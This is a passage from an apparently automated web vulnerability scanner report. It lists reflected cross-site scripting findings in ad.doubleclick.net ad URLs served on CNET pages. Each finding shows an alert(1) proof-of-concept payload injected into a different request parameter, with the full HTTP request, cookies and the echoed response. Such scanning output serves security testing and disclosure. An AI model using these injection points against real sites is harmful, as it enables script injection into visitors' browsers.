Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4619



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41ec397"-alert(1)-"e0f06d702a&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094146_240279859_41826606");
var wmode = "opaque";
var bg = "same as SWF
...[SNIP]...

3.244. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eede8"-alert(1)-"9ee37b710c5 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5eede8"-alert(1)-"9ee37b710c5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/181/%2a/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5eede8"-alert(1)-"9ee37b710c5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mza
...[SNIP]...

3.245. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5cf6"-alert(1)-"6ccb754644a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815a5cf6"-alert(1)-"6ccb754644a&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815a5cf6"-alert(1)-"6ccb754644a&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=
...[SNIP]...

3.246. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8730c"-alert(1)-"de14f00ef84 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=8730c"-alert(1)-"de14f00ef84&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=8730c"-alert(1)-"de14f00ef84&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave/dm:_N5823.CNET_61
...[SNIP]...

3.247. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8647"-alert(1)-"d99c0032c42 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=e8647"-alert(1)-"d99c0032c42&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=e8647"-alert(1)-"d99c0032c42&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave/dm:_N5823.
...[SNIP]...

3.248. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbff8"-alert(1)-"8ca9b69f0e1 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3bbff8"-alert(1)-"8ca9b69f0e1&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
1243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3bbff8"-alert(1)-"8ca9b69f0e1&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://w
...[SNIP]...

3.249. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da5e2"-alert(1)-"c2597d5ca1f was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=da5e2"-alert(1)-"c2597d5ca1f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=da5e2"-alert(1)-"c2597d5ca1f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jump
...[SNIP]...

3.250. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee62e"-alert(1)-"d9f92c1a223 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=ee62e"-alert(1)-"d9f92c1a223 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4732
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:20:04 GMT
Expires: Wed, 27 Apr 2011 23:20:04 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=ee62e"-alert(1)-"d9f92c1a223http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave/dm:_N5823.CNET_61697327_239466418_41243731");
var wmode = "opaque";
var bg = "same as SWF";
var
...[SNIP]...

3.251. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290ad"-alert(1)-"43420ec0b9d was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn290ad"-alert(1)-"43420ec0b9d&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/3af6/17/181/%2a/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn290ad"-alert(1)-"43420ec0b9d&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.24
...[SNIP]...

3.252. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd1b3"-alert(1)-"04e666efca9 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USfd1b3"-alert(1)-"04e666efca9&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USfd1b3"-alert(1)-"04e666efca9&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQ
...[SNIP]...

3.253. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51bd1"-alert(1)-"9b019ff65a6 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068651bd1"-alert(1)-"9b019ff65a6&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

